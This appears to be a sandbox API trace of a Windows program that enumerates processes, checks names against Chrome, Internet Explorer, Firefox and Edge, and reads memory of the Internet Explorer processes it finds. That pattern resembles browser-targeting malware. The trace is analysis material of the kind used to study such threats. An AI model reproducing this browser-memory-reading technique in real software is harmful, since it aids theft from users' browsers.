	[0236.857] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0236.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7974
	[0236.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.860] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0236.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.861] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.861] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0236.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.862] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.863] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0236.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7978
	[0236.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.864] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0236.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.865] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.865] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0236.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.866] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0236.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x797c
	[0236.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.867] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0236.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.868] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.869] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0236.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.870] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.870] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0236.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7980
	[0236.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.873] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0236.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.874] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.875] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0236.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.875] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.876] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0236.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7984
	[0236.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.877] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0236.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.878] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.878] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0236.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.879] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.879] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0236.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7988
	[0236.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.880] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0236.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.881] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.881] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0236.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.882] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0236.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x798c
	[0236.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.883] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0236.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.884] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.885] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0236.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.886] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.886] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0236.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7990
	[0236.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.888] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0236.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.889] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.890] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0236.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.891] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0236.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7994
	[0236.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.893] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0236.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.894] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.895] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0236.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.896] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.896] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0236.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7998
	[0236.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.898] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0236.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.899] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.900] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0236.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.901] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0236.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x799c
	[0236.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.904] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0236.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.905] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.906] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0236.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.907] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x79a0
	[0236.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.908] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.909] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.909] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.910] NtQueryInformationProcess (in: ProcessHandle=0x79a0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.910] ReadProcessMemory (in: hProcess=0x79a0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.911] ReadProcessMemory (in: hProcess=0x79a0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.911] ReadProcessMemory (in: hProcess=0x79a0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.911] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x79a4
	[0236.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.912] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.913] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.913] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.914] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.914] NtQueryInformationProcess (in: ProcessHandle=0x79a4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.914] ReadProcessMemory (in: hProcess=0x79a4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.914] ReadProcessMemory (in: hProcess=0x79a4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.915] ReadProcessMemory (in: hProcess=0x79a4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.915] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x79a8
	[0236.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.916] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.917] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.917] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.921] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.921] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0236.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x79ac
	[0236.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.922] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0236.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.923] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.923] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0236.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.924] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x79b0
	[0236.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.926] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.926] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.927] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.927] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.927] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x79b4
	[0236.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.930] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.930] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.931] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.931] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x79b8
	[0236.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.933] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.934] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.934] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.935] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x79bc
	[0236.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.938] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.938] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.939] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.939] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x79c0
	[0236.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.941] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.941] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.942] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.943] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x79c4
	[0236.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.944] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0236.947] CloseHandle (hObject=0x4fd0) returned 1
	[0236.947] Sleep (dwMilliseconds=0x64) 
	[0237.044] GetCurrentProcessId () returned 0x110
	[0237.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0237.051] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0237.053] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0237.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
